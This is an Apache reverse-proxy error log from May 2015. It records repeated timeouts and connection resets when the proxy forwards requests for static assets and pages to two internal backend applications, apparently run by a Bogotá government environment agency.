[Tue May 12 10:31:22.100710 2015] [proxy:error] [pid 7296:tid 1060] [client 201.245.192.253:55920] AH00898: Error reading from remote server returned by /isolucionsda/ControlDeInicio.asp
[Tue May 12 10:33:06.932894 2015] [proxy_http:error] [pid 7296:tid 968] (20014)Internal error: [client 201.245.192.253:50324] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:33:06.932894 2015] [proxy:error] [pid 7296:tid 968] [client 201.245.192.253:50324] AH00898: Error reading from remote server returned by /forest/js/internJS.js
[Tue May 12 10:33:07.728496 2015] [proxy_http:error] [pid 7296:tid 1292] (20014)Internal error: [client 201.245.192.253:50345] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:33:07.728496 2015] [proxy:error] [pid 7296:tid 1292] [client 201.245.192.253:50345] AH00898: Error reading from remote server returned by /forest/1ibre/jscalendar/calendar-win2k-1.css
[Tue May 12 10:33:07.744096 2015] [proxy_http:error] [pid 7296:tid 768] (20014)Internal error: [client 201.245.192.253:50352] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:33:07.744096 2015] [proxy:error] [pid 7296:tid 768] [client 201.245.192.253:50352] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/js/graphicForm.js
[Tue May 12 10:33:24.623325 2015] [proxy_http:error] [pid 7296:tid 736] (20014)Internal error: [client 172.22.2.1:54488] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/index2.jsp?_a=0.564483053049339
[Tue May 12 10:33:24.623325 2015] [proxy:error] [pid 7296:tid 736] [client 172.22.2.1:54488] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/css/menu.css, referer: http://190.27.245.106/forest/index2.jsp?_a=0.564483053049339
[Tue May 12 10:33:24.654525 2015] [proxy_http:error] [pid 7296:tid 1220] (20014)Internal error: [client 172.22.2.1:54487] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/index2.jsp?_a=0.564483053049339
[Tue May 12 10:33:24.872926 2015] [proxy_http:error] [pid 7296:tid 1692] (20014)Internal error: [client 172.22.2.1:54486] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/index2.jsp?_a=0.564483053049339
[Tue May 12 10:33:24.888526 2015] [proxy_http:error] [pid 7296:tid 1044] (20014)Internal error: [client 172.22.2.1:54489] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/index2.jsp?_a=0.564483053049339
[Tue May 12 10:34:22.109426 2015] [proxy_http:error] [pid 7296:tid 1716] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:58981] AH01102: error reading status line from remote server 172.22.1.31:80
[Tue May 12 10:34:22.109426 2015] [proxy:error] [pid 7296:tid 1716] [client 201.245.192.253:58981] AH00898: Error reading from remote server returned by /isolucionsda/ControlDeInicio.asp
[Tue May 12 10:36:39.576868 2015] [proxy_http:error] [pid 7296:tid 1836] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:53859] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue May 12 10:36:39.576868 2015] [proxy:error] [pid 7296:tid 1836] [client 201.245.192.253:53859] AH00898: Error reading from remote server returned by /isolucionsda/Menu.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue May 12 10:36:39.592468 2015] [proxy_http:error] [pid 7296:tid 948] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:49553] AH01102: error reading status line from remote server 172.22.1.31:80
[Tue May 12 10:36:39.592468 2015] [proxy:error] [pid 7296:tid 948] [client 201.245.192.253:49553] AH00898: Error reading from remote server returned by /isolucionsda/ControlDeInicio.asp
[Tue May 12 10:36:39.592468 2015] [proxy_http:error] [pid 7296:tid 1356] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:53856] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Menu.asp&IdModulo=4
[Tue May 12 10:36:39.592468 2015] [proxy_http:error] [pid 7296:tid 968] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:54207] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Tue May 12 10:40:50.409708 2015] [proxy_http:error] [pid 7296:tid 992] (20014)Internal error: [client 201.245.192.253:48063] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/misactividades.do?group_system_actual=3&codPro=176&_a=0.40951192429694183
[Tue May 12 10:43:36.784001 2015] [proxy_http:error] [pid 7296:tid 1060] (20014)Internal error: [client 201.245.192.253:50952] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:43:36.784001 2015] [proxy:error] [pid 7296:tid 1060] [client 201.245.192.253:50952] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/js/autocompletar2.js
[Tue May 12 10:43:37.142801 2015] [proxy_http:error] [pid 7296:tid 1124] (20014)Internal error: [client 201.245.192.253:48161] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/usutareas.do?group_system_actual=3&a=0.7444512648603834
[Tue May 12 10:43:39.358005 2015] [proxy_http:error] [pid 7296:tid 1484] (20014)Internal error: [client 201.245.192.253:51114] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:43:39.358005 2015] [proxy:error] [pid 7296:tid 1484] [client 201.245.192.253:51114] AH00898: Error reading from remote server returned by /forest/img/inicio.jpg
[Tue May 12 10:52:01.555087 2015] [proxy_http:error] [pid 7296:tid 1628] (20014)Internal error: [client 186.154.253.106:51335] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/radicacion.do?codMod=11&group_system_actual=4&_a=0.33073733118362725
[Tue May 12 10:52:01.570687 2015] [proxy_http:error] [pid 7296:tid 1092] (20014)Internal error: [client 186.154.253.106:51351] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/radicacion.do?codMod=11&group_system_actual=4&_a=0.33073733118362725
[Tue May 12 10:52:01.570687 2015] [proxy_http:error] [pid 7296:tid 1180] (20014)Internal error: [client 186.154.253.106:51336] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/radicacion.do?codMod=11&group_system_actual=4&_a=0.33073733118362725
[Tue May 12 10:52:01.586287 2015] [proxy_http:error] [pid 7296:tid 1092] (20014)Internal error: [client 186.154.253.106:51352] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/radicacion.do?codMod=11&group_system_actual=4&_a=0.33073733118362725
[Tue May 12 10:52:01.586287 2015] [proxy:error] [pid 7296:tid 1092] [client 186.154.253.106:51352] AH00898: Error reading from remote server returned by /forest/img/next.jpg, referer: http://190.27.245.106/forest/radicacion.do?codMod=11&group_system_actual=4&_a=0.33073733118362725
[Tue May 12 10:52:01.586287 2015] [proxy_http:error] [pid 7296:tid 736] (20014)Internal error: [client 186.154.253.106:51337] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/radicacion.do?codMod=11&group_system_actual=4&_a=0.33073733118362725
[Tue May 12 10:52:01.601887 2015] [proxy_http:error] [pid 7296:tid 1780] (20014)Internal error: [client 186.154.253.106:51334] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/radicacion.do?codMod=11&group_system_actual=4&_a=0.33073733118362725
[Tue May 12 10:52:01.617487 2015] [proxy_http:error] [pid 7296:tid 1780] (20014)Internal error: [client 186.154.253.106:51355] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/radicacion.do?codMod=11&group_system_actual=4&_a=0.33073733118362725
[Tue May 12 10:52:01.617487 2015] [proxy:error] [pid 7296:tid 1780] [client 186.154.253.106:51355] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/img/select.gif, referer: http://190.27.245.106/forest/radicacion.do?codMod=11&group_system_actual=4&_a=0.33073733118362725
[Tue May 12 10:59:29.837475 2015] [proxy_http:error] [pid 7296:tid 828] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:59335] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_articulo=8493
[Tue May 12 10:59:29.837475 2015] [proxy:error] [pid 7296:tid 828] [client 201.245.192.253:59335] AH00898: Error reading from remote server returned by /isolucionsda/Administracion/Graficas/vacio1x1.gif, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_articulo=8493
[Tue May 12 11:02:13.512962 2015] [proxy_http:error] [pid 7296:tid 1472] (20014)Internal error: [client 201.245.192.253:50634] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 11:02:13.512962 2015] [proxy:error] [pid 7296:tid 1472] [client 201.245.192.253:50634] AH00898: Error reading from remote server returned by /forest/1ibre/jscalendar/calendar-setup.js
[Tue May 12 11:02:17.584569 2015] [proxy_http:error] [pid 7296:tid 968] (20014)Internal error: [client 201.245.192.253:50710] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 11:02:17.584569 2015] [proxy:error] [pid 7296:tid 968] [client 201.245.192.253:50710] AH00898: Error reading from remote server returned by /forest/img/nav_next.gif
[Tue May 12 11:02:35.680601 2015] [proxy_http:error] [pid 7296:tid 828] (20014)Internal error: [client 201.245.192.253:51106] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 11:02:35.680601 2015] [proxy:error] [pid 7296:tid 828] [client 201.245.192.253:51106] AH00898: Error reading from remote server returned by /forest/img/jquery/ui-bg_flat_55_fbec88_40x100.png
[Tue May 12 11:04:14.834375 2015] [proxy_http:error] [pid 7296:tid 1604] (20014)Internal error: [client 201.245.192.253:53008] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/usutareas.do?_a=0.6695977850194982&group_system_actual=3
[Tue May 12 11:05:47.467338 2015] [proxy_http:error] [pid 7296:tid 768] (20014)Internal error: [client 201.245.192.253:54926] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 11:05:47.467338 2015] [proxy:error] [pid 7296:tid 768] [client 201.245.192.253:54926] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/img/icons/pdf.gif
[Tue May 12 11:05:56.406154 2015] [proxy_http:error] [pid 7296:tid 828] (20014)Internal error: [client 201.245.192.253:55066] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 11:05:56.406154 2015] [proxy:error] [pid 7296:tid 828] [client 201.245.192.253:55066] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/css/forest.css
[Tue May 12 11:06:02.006563 2015] [proxy_http:error] [pid 7296:tid 768] (20014)Internal error: [client 201.245.192.253:55161] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 11:06:02.006563 2015] [proxy:error] [pid 7296:tid 768] [client 201.245.192.253:55161] AH00898: Error reading from remote server returned by /forest/css/autocomplete.css
[Tue May 12 11:06:20.804596 2015] [proxy_http:error] [pid 7296:tid 1524] (20014)Internal error: [client 201.245.192.253:55591] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/misactividades.do?group_system_actual=3&codPro=176&_a=0.5445341011316962
[Tue May 12 11:06:22.114999 2015] [proxy_http:error] [pid 7296:tid 1524] (20014)Internal error: [client 201.245.192.253:55650] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/usutareas.do?_a=0.7677311677484983&group_system_actual=3
[Tue May 12 11:06:22.224199 2015] [proxy_http:error] [pid 7296:tid 1044] (20014)Internal error: [client 201.245.192.253:55683] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 11:06:22.224199 2015] [proxy:error] [pid 7296:tid 1044] [client 201.245.192.253:55683] AH00898: Error reading from remote server returned by /forest/css/escritorio.css
[Tue May 12 11:06:22.224199 2015] [proxy_http:error] [pid 7296:tid 1092] (20014)Internal error: [client 201.245.192.253:55687] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 11:06:22.224199 2015] [proxy:error] [pid 7296:tid 1092] [client 201.245.192.253:55687] AH00898: Error reading from remote server returned by /forest/js/socketConnection.js
[Tue May 12 11:06:22.255399 2015] [proxy_http:error] [pid 7296:tid 1876] (20014)Internal error: [client 201.245.192.253:55697] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 11:06:22.255399 2015] [proxy:error] [pid 7296:tid 1876] [client 201.245.192.253:55697] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/img/disk.png
[Tue May 12 11:06:22.255399 2015] [proxy_http:error] [pid 7296:tid 1780] (20014)Internal error: [client 201.245.192.253:55703] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 11:06:22.255399 2015] [proxy:error] [pid 7296:tid 1780] [client 201.245.192.253:55703] AH00898: Error reading from remote server returned by /forest/img/forestIcon.gif
[Tue May 12 11:06:22.270999 2015] [proxy_http:error] [pid 7296:tid 1472] (20014)Internal error: [client 201.245.192.253:55705] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 11:06:22.270999 2015] [proxy:error] [pid 7296:tid 1472] [client 201.245.192.253:55705] AH00898: Error reading from remote server returned by /forest/js/jquery/jquery-1.5.2.min.js
[Tue May 12 11:06:22.504999 2015] [proxy_http:error] [pid 7296:tid 1652] (20014)Internal error: [client 201.245.192.253:55715] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 11:06:22.504999 2015] [proxy:error] [pid 7296:tid 1652] [client 201.245.192.253:55715] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/img/bgPanel.jpg
[Tue May 12 11:06:23.924602 2015] [proxy_http:error] [pid 7296:tid 1780] (20014)Internal error: [client 201.245.192.253:55717] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/misactividades.do?group_system_actual=3&codPro=176&_a=0.5445341011316962
[Tue May 12 11:06:51.084250 2015] [proxy_http:error] [pid 7296:tid 1524] (20014)Internal error: [client 201.245.192.253:56446] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/usutareas.do?_a=0.07625447093888138&group_system_actual=3
[Tue May 12 11:06:51.209050 2015] [proxy_http:error] [pid 7296:tid 1108] (20014)Internal error: [client 201.245.192.253:56456] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/usutareas.do?_a=0.07625447093888138&group_system_actual=3
[Tue May 12 11:06:51.209050 2015] [proxy:error] [pid 7296:tid 1108] [client 201.245.192.253:56456] AH00898: Error reading from remote server returned by /forest/session.jsp, referer: http://190.27.245.106/forest/usutareas.do?_a=0.07625447093888138&group_system_actual=3
[Tue May 12 11:06:51.209050 2015] [negotiation:error] [pid 7296:tid 1108] [client 201.245.192.253:56456] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_BAD_GATEWAY.html.var, referer: http://190.27.245.106/forest/usutareas.do?_a=0.07625447093888138&group_system_actual=3
[Tue May 12 11:09:09.331692 2015] [proxy_http:error] [pid 7296:tid 1652] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:47720] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/ListarMedio.asp?Imagen=imgObjeto40_1&Campo=Objeto40_1&Ruta=bancoconocimiento\\m\\manualdegestiondelareddemonitoreodecalidaddelairedebogota_v3
[Tue May 12 11:09:09.331692 2015] [proxy:error] [pid 7296:tid 1652] [client 201.245.192.253:47720] AH00898: Error reading from remote server returned by /isolucionsda/bancoconocimiento/m/manualdegestiondelareddemonitoreodecalidaddelairedebogota_v3/50.jpg, referer: http://190.27.245.106/isolucionsda/Administracion/ListarMedio.asp?Imagen=imgObjeto40_1&Campo=Objeto40_1&Ruta=bancoconocimiento\\m\\manualdegestiondelareddemonitoreodecalidaddelairedebogota_v3
[Tue May 12 11:09:10.626495 2015] [proxy_http:error] [pid 7296:tid 1356] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:47718] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/ListarMedio.asp?Imagen=imgObjeto40_1&Campo=Objeto40_1&Ruta=bancoconocimiento\\m\\manualdegestiondelareddemonitoreodecalidaddelairedebogota_v3
